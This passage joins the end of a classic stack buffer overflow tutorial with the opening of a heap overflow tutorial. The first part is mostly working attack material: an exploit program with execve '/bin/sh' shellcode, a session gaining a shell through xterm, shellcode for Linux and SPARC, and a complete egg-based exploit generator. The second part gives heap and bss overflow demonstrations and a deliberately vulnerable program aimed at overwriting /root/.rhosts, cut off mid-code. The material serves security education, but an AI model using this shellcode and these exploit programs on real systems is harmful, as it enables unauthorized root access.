wont fit into it, and it will overwrite the return address with instructions instead of the address of our code, or the number of NOPs you can pad the front of the string with is so small that the chances of guessing their address is minuscule. To obtain a shell from these programs we will have to go about it another way. This particular approach only works when you have access to the program's environment variables. What we will do is place our shellcode in an environment variable, and then overflow the buffer with the address of this variable in memory. This method also increases your changes of the exploit working as you can make the environment variable holding the shell code as large as you want. The environment variables are stored in the top of the stack when the program is started, any modification by setenv() are then allocated elsewhere. The stack at the beginning then looks like this: NULLNULL Our new program will take an extra variable, the size of the variable containing the shellcode and NOPs. Our new exploit now looks like this: exploit4.c ------------------------------------------------------------------------------ #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_esp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(buff,"RET=",4); putenv(buff); system("/bin/bash"); } ------------------------------------------------------------------------------ Lets try our new exploit with our vulnerable test program: ------------------------------------------------------------------------------ [aleph1]$ ./exploit4 768 Using address: 0xbffffdb0 [aleph1]$ ./vulnerable $RET $ ------------------------------------------------------------------------------ Works like a charm. Now lets try it on xterm: ------------------------------------------------------------------------------ [aleph1]$ export DISPLAY=:0.0 [aleph1]$ ./exploit4 2148 Using address: 0xbffffdb0 [aleph1]$ /usr/X11R6/bin/xterm -fg $RET Warning: Color name "°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿° ¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿ °¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿° ¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿ °¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿ¿°¤ÿÿ¿°¤ÿ¿ °¤ÿ¿°¤ÿ¿°¤ Warning: some arguments in previous message were lost $ ------------------------------------------------------------------------------ On the first try! It has certainly increased our odds. Depending how much environment data the exploit program has compared with the program you are trying to exploit the guessed address may be to low or to high. Experiment both with positive and negative offsets. Finding Buffer Overflows ~~~~~~~~~~~~~~~~~~~~~~~~ As stated earlier, buffer overflows are the result of stuffing more information into a buffer than it is meant to hold. Since C does not have any built-in bounds checking, overflows often manifest themselves as writing past the end of a character array. The standard C library provides a number of functions for copying or appending strings, that perform no boundary checking. They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions operate on null-terminated strings, and do not check for overflow of the receiving string. gets() is a function that reads a line from stdin into a buffer until either a terminating newline or EOF. It performs no checks for buffer overflows. The scanf() family of functions can also be a problem if you are matching a sequence of non-white-space characters (%s), or matching a non-empty sequence of characters from a specified set (%[]), and the array pointed to by the char pointer, is not large enough to accept the whole sequence of characters, and you have not defined the optional maximum field width. If the target of any of these functions is a buffer of static size, and its other argument was somehow derived from user input there is a good posibility that you might be able to exploit a buffer overflow. Another usual programming construct we find is the use of a while loop to read one character at a time into a buffer from stdin or some file until the end of line, end of file, or some other delimiter is reached. This type of construct usually uses one of these functions: getc(), fgetc(), or getchar(). If there is no explicit checks for overflows in the while loop, such programs are easily exploited. To conclude, grep(1) is your friend. The sources for free operating systems and their utilities is readily available. This fact becomes quite interesting once you realize that many comercial operating systems utilities where derived from the same sources as the free ones. Use the source d00d. Appendix A - Shellcode for Different Operating Systems/Architectures ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ i386/Linux ------------------------------------------------------------------------------ jmp 0x1f popl %esi movl %esi,0x8(%esi) xorl %eax,%eax movb %eax,0x7(%esi) movl %eax,0xc(%esi) movb $0xb,%al movl %esi,%ebx leal 0x8(%esi),%ecx leal 0xc(%esi),%edx int $0x80 xorl %ebx,%ebx movl %ebx,%eax inc %eax int $0x80 call -0x24 .string \"/bin/sh\" ------------------------------------------------------------------------------ SPARC/Solaris ------------------------------------------------------------------------------ sethi 0xbd89a, %l6 or %l6, 0x16e, %l6 sethi 0xbdcda, %l7 and %sp, %sp, %o0 add %sp, 8, %o1 xor %o2, %o2, %o2 add %sp, 16, %sp std %l6, [%sp - 16] st %sp, [%sp - 8] st %g0, [%sp - 4] mov 0x3b, %g1 ta 8 xor %o7, %o7, %o0 mov 1, %g1 ta 8 ------------------------------------------------------------------------------ SPARC/SunOS ------------------------------------------------------------------------------ sethi 0xbd89a, %l6 or %l6, 0x16e, %l6 sethi 0xbdcda, %l7 and %sp, %sp, %o0 add %sp, 8, %o1 xor %o2, %o2, %o2 add %sp, 16, %sp std %l6, [%sp - 16] st %sp, [%sp - 8] st %g0, [%sp - 4] mov 0x3b, %g1 mov -0x1, %l5 ta %l5 + 1 xor %o7, %o7, %o0 mov 1, %g1 ta %l5 + 1 ------------------------------------------------------------------------------ Appendix B - Generic Buffer Overflow Program ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode.h ------------------------------------------------------------------------------ #if defined(__i386__) && defined(__linux__) #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } #elif defined(__sparc__) && defined(__sun__) && defined(__svr4__) #define NOP_SIZE 4 char nop[]="\xac\x15\xa1\x6e"; char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08"; unsigned long get_sp(void) { __asm__("or %sp, %sp, %i0"); } #elif defined(__sparc__) && defined(__sun__) #define NOP_SIZE 4 char nop[]="\xac\x15\xa1\x6e"; char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\xaa\x10\x3f\xff" "\x91\xd5\x60\x01\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd5\x60\x01"; unsigned long get_sp(void) { __asm__("or %sp, %sp, %i0"); } #endif ------------------------------------------------------------------------------ eggshell.c ------------------------------------------------------------------------------ /* * eggshell v1.0 * * Aleph One / aleph1@underground.org */ #include #include #include "shellcode.h" #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 void usage(void); void main(int argc, char *argv[]) { char *ptr, *bof, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE; while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF) switch (c) { case 'a': align = atoi(optarg); break; case 'b': bsize = atoi(optarg); break; case 'e': eggsize = atoi(optarg); break; case 'o': offset = atoi(optarg); break; case '?': usage(); exit(0); } if (strlen(shellcode) > eggsize) { printf("Shellcode is larger the the egg.\n"); exit(0); } if (!(bof = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("[ Buffer size:\t%d\t\tEgg size:\t%d\tAligment:\t%d\t]\n", bsize, eggsize, align); printf("[ Address:\t0x%x\tOffset:\t\t%d\t\t\t\t]\n", addr, offset); addr_ptr = (long *) bof; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE) for (n = 0; n < NOP_SIZE; n++) { m = (n + align) % NOP_SIZE; *(ptr++) = nop[m]; } for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; bof[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(bof,"BOF=",4); putenv(bof); system("/bin/sh"); } void usage(void) { (void)fprintf(stderr, "usage: eggshell [-a ] [-b ] [-e ] [-o ]\n"); } ------------------------------------------------------------------------------
 

Article 3

Subject: w00w00 on Heap Overflows

This is a PRELIMINARY BETA VERSION of our final article! We apologize for
any mistakes.  We still need to add a few more things.

[ Note: You may also get this article off of ]
[ http://www.w00w00.org/articles.html.       ]

w00w00 on Heap Overflows
By: Matt Conover (a.k.a. Shok) & w00w00 Security Team

------------------------------------------------------------------------------
Copyright (C) January 1999, Matt Conover & w00w00 Security Development

You may freely redistribute or republish this article, provided the
following conditions are met:

1. This article is left intact (no changes made, the full article
   published, etc.)

2. Proper credit is given to its authors; Matt Conover (Shok) and the 
   w00w00 Security Development (WSD).

You are free to rewrite your own articles based on this material (assuming
the above conditions are met). It'd also be appreciated if an e-mail is
sent to either mattc@repsec.com or shok@dataforce.net to let us know you
are going to be republishing this article or writing an article based upon
one of our ideas.

------------------------------------------------------------------------------

Prelude:
  Heap/BSS-based overflows are fairly common in applications today; yet,
  they are rarely reported.  Therefore, we felt it was appropriate to
  present a "heap overflow" tutorial.  The biggest critics of this article
  will probably be those who argue heap overflows have been around for a
  while.  Of course they have, but that doesn't negate the need for such
  material.

  In this article, we will refer to "overflows involving the stack" as
  "stack-based overflows" ("stack overflow" is misleading) and "overflows
  involving the heap" as "heap-based overflows".

  This article should provide the following: a better understanding
  of heap-based overflows along with several methods of exploitation,
  demonstrations, and some possible solutions/fixes.  Prerequisites to
  this article: a general understanding of computer architecture, 
  assembly, C, and stack overflows.
			
  This is a collection of the insights we have gained through our research
  with heap-based overflows and the like.  We have written all the
  examples and exploits included in this article; therefore, the copyright
  applies to them as well.
  

Why Heap/BSS Overflows are Significant
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 As more system vendors add non-executable stack patches, or individuals 
 apply their own patches (e.g., Solar Designer's non-executable stack
 patch), a different method of penetration is needed by security
 consultants (or else, we won't have jobs!).  Let me give you a few
 examples:

   1. Searching for the word "heap" on BugTraq (for the archive, see
      www.geek-girl.com/bugtraq), yields only 40+ matches, whereas
      "stack" yields 2300+ matches (though several are irrelevant).  Also,
      "stack overflow" gives twice as many matches as "heap" does.

   2. Solaris (an OS developed by Sun Microsystems), as of Solaris
      2.6, sparc Solaris includes a "protect_stack" option, but not an
      equivalent "protect_heap" option.  Fortunately, the bss is not
      executable (and need not be).

   3. There is a "StackGuard" (developed by Crispin Cowan et. al.), but
      no equivalent "HeapGuard".

   4. Using a heap/bss-based overflow was one of the "potential" methods
      of getting around StackGuard.  The following was posted to BugTraq
      by Tim Newsham several months ago:

        > Finally the precomputed canary values may be a target
        > themselves.  If there is an overflow in the data or bss segments
        > preceding the precomputed canary vector, an attacker can simply
        > overwrite all the canary values with a single value of his
        > choosing, effectively turning off stack protection.

   5. Some people have actually suggested making a "local" buffer a
      "static" buffer, as a fix!  This not very wise; yet, it is a fairly
      common misconception of how the heap or bss work.

 Although heap-based overflows are not new, they don't seem to be well
 understood.

 Note:
   One argument is that the presentation of a "heap-based overflow" is
   equivalent to a "stack-based overflow" presentation.  However, only a
   small proportion of this article has the same presentation (if you
   will) that is equivalent to that of a "stack-based overflow".

 People go out of their way to prevent stack-based overflows, but leave
 their heaps/bss' completely open!  On most systems, both heap and bss are
 both executable and writeable (an excellent combination).  This makes
 heap/bss overflows very possible.  But, I don't see any reason for the
 bss to be executable!  What is going to be executed in zero-filled
 memory?!

 For the security consultant (the ones doing the penetration assessment),
 most heap-based overflows are system and architecture independent,
 including those with non-executable heaps.  This will all be demonstrated
 in the "Exploiting Heap/BSS Overflows" section.

Terminology
~~~~~~~~~~~
 An executable file, such as ELF (Executable and Linking Format)
 executable, has several "sections" in the executable file, such as: the
 PLT (Procedure Linking Table), GOT (Global Offset Table), init 
 (instructions executed on initialization), fini (instructions to be 
 executed upon termination), and ctors and dtors (contains global 
 constructors/destructors).


"Memory that is dynamically allocated by the application is known as the
heap." The words "by the application" are important here, as on good
systems most areas are in fact dynamically allocated at the kernel level,
while for the heap, the allocation is requested by the application.

Heap and Data/BSS Sections
~~~~~~~~~~~~~~~~~~~~~~~~~~
 The heap is an area in memory that is dynamically allocated by the
 application.  The data section initialized at compile-time.

 The bss section contains uninitialized data, and is allocated at
 run-time.  Until it is written to, it remains zeroed (or at least from
 the application's point-of-view).

 Note:
   When we refer to a "heap-based overflow" in the sections below, we are
   most likely referring to buffer overflows of both the heap and data/bss
   sections.
									
 On most systems, the heap grows up (towards higher addresses).  Hence,
 when we say "X is below Y," it means X is lower in memory than Y.


Exploiting Heap/BSS Overflows
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 In this section, we'll cover several different methods to put heap/bss
 overflows to use.  Most of examples for Unix-dervied x86 systems, will
 also work in DOS and Windows (with a few changes).  We've also included 
 a few DOS/Windows specific exploitation methods.  An advanced warning:
 this will be the longest section, and should be studied the most.

 Note:
   In this article, I use the "exact offset" approach.  The offset
   must be closely approximated to its actual value.  The alternative is
   "stack-based overflow approach" (if you will), where one repeats the 
   addresses to increase the likelihood of a successful exploit.

 While this example may seem unnecessary, we're including it for those who
 are unfamiliar with heap-based overflows.  Therefore, we'll include this
 quick demonstration:
 -----------------------------------------------------------------------------
   /* demonstrates dynamic overflow in heap (initialized data) */

   #include 
   #include 
   #include 
   #include 

   #define BUFSIZE 16
   #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

   int main()
   {
      u_long diff;
      char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

      diff = (u_long)buf2 - (u_long)buf1;
      printf("buf1 = %p, buf2 = %p, diff = 0x%x bytes\n", buf1, buf2, diff);

      memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';

      printf("before overflow: buf2 = %s\n", buf2);
      memset(buf1, 'B', (u_int)(diff + OVERSIZE));
      printf("after overflow: buf2 = %s\n", buf2);

      return 0;
   }
 -----------------------------------------------------------------------------

 If we run this, we'll get the following:
   [root /w00w00/heap/examples/basic]# ./heap1 8
   buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
   before overflow: buf2 = AAAAAAAAAAAAAAA
   after overflow: buf2 = BBBBBBBBAAAAAAA

 This works because buf1 overruns its boundaries into buf2's heap space.
 But, because buf2's heap space is still valid (heap) memory, the program
 doesn't crash. 

 Note:
   A possible fix for a heap-based overflow, which will be mentioned
   later, is to put "canary" values between all variables on the heap
   space (like that of StackGuard mentioned later) that mustn't be changed
   throughout execution.

 You can get the complete source to all examples used in this article,
 from the file attachment, heaptut.tgz.  You can also download this from
 our article archive at http://www.w00w00.org/articles.html.

 Note:
   To demonstrate a bss-based overflow, change line:
   from: 'char *buf = malloc(BUFSIZE)', to: 'static char buf[BUFSIZE]'

 Yes, that was a very basic example, but we wanted to demonstrate a heap
 overflow at its most primitive level.  This is the basis of almost
 all heap-based overflows.  We can use it to overwrite a filename, a
 password, a saved uid, etc.  Here is a (still primitive) example of 
 manipulating pointers:
 -----------------------------------------------------------------------------
   /* demonstrates static pointer overflow in bss (uninitialized data) */

   #include 
   #include 
   #include 
   #include 
   #include 

   #define BUFSIZE 16
   #define ADDRLEN 4 /* # of bytes in an address */

   int main()
   {
      u_long diff;
      static char buf[BUFSIZE], *bufptr;

      bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;

      printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n",
             &bufptr, bufptr, buf, diff, diff);

      memset(buf, 'A', (u_int)(diff + ADDRLEN));

      printf("bufptr (%p) = %p, buf = %p, diff = 0x%x (%d) bytes\n", 
             &bufptr, bufptr, buf, diff, diff);

      return 0;
   }
 -----------------------------------------------------------------------------

 The results:
   [root /w00w00/heap/examples/basic]# ./heap3
   bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes
   bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes
 
 When run, one clearly sees that the pointer now points to a different
 address.  Uses of this?  One example is that we could overwrite a 
 temporary filename pointer to point to a separate string (such as
 argv[1], which we could supply ourselves), which could contain
 "/root/.rhosts".  Hopefully, you are starting to see some potential uses.

 To demonstrate this, we will use a temporary file to momentarily save
 some input from the user. This is our finished "vulnerable program":
 -----------------------------------------------------------------------------
   /*
    * This is a typical vulnerable program.  It will store user input in a
    * temporary file.
    *
    * Compile as: gcc -o vulprog1 vulprog1.c
    */

   #include 
   #include 
   #include 
   #include 
   #include 

   #define ERROR -1
   #define BUFSIZE 16

   /*
    * Run this vulprog as root or change the "vulfile" to something else.
    * Otherwise, even if the exploit works, it won't have permission to
    * overwrite /root/.rhosts (the default "example").
    */

   int main(int argc, char **argv)
   {
      FILE *tmpfd;
      static char buf[BUFSIZE], *tmpfile;

      if (argc <= 1)
      {
         fprintf(stderr, "Usage: %s \n", argv[0]);
         exit(ERROR);
      }

      tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */
      printf("before: tmpfile = %s\n", tmpfile);

      printf("Enter one line of data to put in %s: ", tmpfile);
